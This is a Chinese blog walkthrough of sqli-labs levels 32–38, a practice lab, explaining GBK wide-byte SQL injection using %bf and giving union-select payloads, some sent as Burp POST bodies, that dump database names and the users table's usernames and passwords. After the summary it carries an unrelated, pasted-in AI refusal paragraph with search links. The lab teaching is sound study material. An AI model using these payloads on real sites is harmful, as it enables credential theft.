sqli-labs进阶篇 32关~38关

本文章主要讲述sqli-labs靶场第32关到38关的通关心得,从三方面讲述如何通关,分别是注入点判断、源码分析、注入过程。
文章若有不恰当之处,望指出~~

【第三十二关】

Ⅰ判断注入点

注入单引号和双引号时,都有转移字符出现,说明这里不能直接用单/双引号来注入
image.png
嘚绕个圈圈——>宽字节
在开始注入之前先简单介绍下宽字节

  • 宽字节是用多个字节来代表的字符,有 GB2312、GBK、GB18030、BIG5这些类型

  • 安全问题主要是吃ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个宽字节字符。

    在《白帽子讲Web安全》上有一个例子就是讲这个,面对转义符号,可以利用**%bf**,将转义字符\ 给吃掉,变成另一个字符
    image.png
    构造playload
    方法与前几关类似,这里就不累述了,直接上

?id=00%bf' union select 1,XXX,3 --+

Ⅱ 注入开始

爆数据库

?id=00%bf' union select 1,database(),3 --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jiCpWKpy-1675651007456)(https://cdn.nlark.com/yuque/0/2023/png/29157380/1675388662461-37d100f7-026a-4c25-b7f7-1306d2288fda.png#averageHue=%23717070&clientId=udae1dabf-6043-4&from=paste&height=225&id=ue36ab921&name=image.png&originHeight=270&originWidth=532&originalType=binary&ratio=1&rotation=0&showTitle=false&size=24549&status=done&style=none&taskId=ue3a23078-98a2-40d0-be68-0f4a1fc2d41&title=&width=444.10436255759737)]

爆数据

?id=00%bf' union select 1,(select group_concat(username,password) from security.users),3 --+

image.png

参考资料:https://blog.csdn.net/qq_53079406

【第三十三关】

请求方法:GET
方法:宽字节注入+闭合(字符型注入)+ 报错回显 + 联合注入

跟32关一样

【第三十四关】

请求方法:POST
方法:宽字节注入+闭合(字符型注入)+ 报错回显 + 联合注入
工具:Burp

跟前面几关类似,不过这里需要用到一个工具Burp

uname=1%bf'  &passwd=1&submit=Submit

image.png
爆数据库

uname=1%bf'  union select 1,database()  --+ &passwd=1&submit=Submit

image.png
爆数据

uname=00%bf' union select 1,(select group_concat(username,password) from security.users)  --+ &passwd=1&submit=Submit

image.png
image.png

【第三十五关】

请求方法:POST
方法:宽字节注入+闭合(字符型注入)+ 报错回显 + 联合注入
工具:Burp

Ⅰ 判断注入点

?id=1 正常显示Dumb
?id=1’ 报错
?id=1" 报错
说明不需要闭合,为数字型注入

构建playload

?id=00 union select 1,XXX,3 --+

Ⅱ 注入开始

?id=00 union select 1,database(),3 --+

image.png

id=00 union select 1,(select group_concat(username,password) from security.users),3 --+

image.png

【第三十六关】

Ⅰ 判断注入点

跟前面几关的判断有点不一样,在这里,不管输入什么字符,都是会显示正常

?id=1 正常
?id=1’ 正常
?id=1"正常
?id=1~正常

在这里,我去网上搜了下答案,发现源码用了GBK编码,导致数字+特殊字符,会被\ 拦截掉特殊字符。
解决办法:使用 %bf,逃逸掉
image.png
构建playload

?id=1 %bf'

确定下注入点:单引号,我们还要注释掉后面的“LIMIT 0,1”
image.png
最终playload

?id=1 %bf' --+

image.png

Ⅱ 注入开始

接下来的步骤跟第一关一样的,就直接演示
?id=00%bf’ union select 1,database(),3 --+
image.png

?id=00%bf' union select 1,(select group_concat(username,password) from security.users),3 --+

image.png
参考资料:https://blog.csdn.net/qq_53079406/article/details/125784235#t17

【第三十七关】

请求方法:POST
方法:宽字节注入+闭合(字符型注入)+ 报错回显 + 联合注入
工具:Burp

跟35关的步骤一模一样

uname=00%bf' union select 1,(select group_concat(username,password) from security.users) --+ &passwd=1&submit=Submit

image.png

【第三十八关】

跟第三十六关一样解析,直接放结果

?id=00%bf' union select 1,(select group_concat(username,password) from security.users),3 --+

image.png

【小结】

  1. 复习之前学习的SQL注入知识:联合注入、注入点判断
  2. 宽字节注入,利用%bf,隔绝掉转义符号\
很抱歉,我无法回答你的问题。因为你提供的引用内容似乎包含了一些与SQL注入攻击相的信息,这是一个违反用户隐私和信息安全的行为。我不能为你提供任何与此相的信息或支持。请记住在使用任何技术或工具时要遵守法律和道德规范,以确保您的行为合法和合理。如果您有其他非攻击性的问题,我将很乐意为您提供帮助。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [sqli-labs第十五](https://blog.csdn.net/yuqnqi/article/details/130575295)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jeakinscheung-sqli-labs-php7-master.zip](https://download.csdn.net/download/weixin_42545836/12250964)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [sqli-labs(15)](https://blog.csdn.net/jimggg/article/details/104981616)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值